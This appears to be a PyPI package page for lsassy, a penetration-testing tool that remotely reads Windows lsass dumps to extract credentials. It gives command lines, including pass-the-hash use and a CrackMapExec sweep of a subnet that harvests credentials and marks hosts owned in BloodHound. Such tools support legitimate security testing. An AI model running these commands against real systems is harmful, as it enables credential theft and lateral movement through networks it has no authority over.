Skip to main content

Python library to parse remote lsass dumps

Project description

lsassy

PyPI version

Python library to remotely parse lsass dump and extract credentials. This library uses impacket projects to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.

CME Module example

Requirements

Basic Usage

lsassy [--hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target>:/share_name/path/to/lsass.dmp

CrackMapExec module

I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts

CrackMapExec module is in cme folder : CME Module

Examples

lsassy

lsassy ADSEC.LOCAL/jsnow:Winter_is_coming_\!@dc01.adsec.local:/C$/Windows/Temp/lsass.dmp

lsassy --hashes 952c28bd2fd728898411b301475009b7 Administrateur@desktop01.adsec.local:/ADMIN$/lsass.dmp

CME Module

crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound```

Installing

From pip

python3.7 -m pip install lsassy

From sources

python3.7 setup.py install

ChangeLog

v0.2.0
------
* Add BloodHound option to CME module (-o BLOODHOUND=True)
    - Set compromised targets as "owned" in BloodHound
    - Check if compromised users have at least one path to domain admin
* Custom parsing (json, grep, pretty [default])
* New --hashes option to lsassy


v0.1.1
------
* Include CME module in repository
* Add credentials to CME database


v0.1.0
------
First release

Acknowledgments

  • Impacket
  • SkelSec for Pypykatz, but also for his patience and help
  • mpgn for his help and ideas

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Files for lsassy, version 0.2.2
Filename, size File type Python version Upload date Hashes
Filename, size lsassy-0.2.2-py3-none-any.whl (8.6 kB) File type Wheel Python version py3 Upload date Hashes View hashes
Filename, size lsassy-0.2.2.tar.gz (6.1 kB) File type Source Python version None Upload date Hashes View hashes

Supported by

Elastic Elastic Search Pingdom Pingdom Monitoring Google Google BigQuery Sentry Sentry Error logging AWS AWS Cloud computing DataDog DataDog Monitoring Fastly Fastly CDN SignalFx SignalFx Supporter DigiCert DigiCert EV certificate StatusPage StatusPage Status page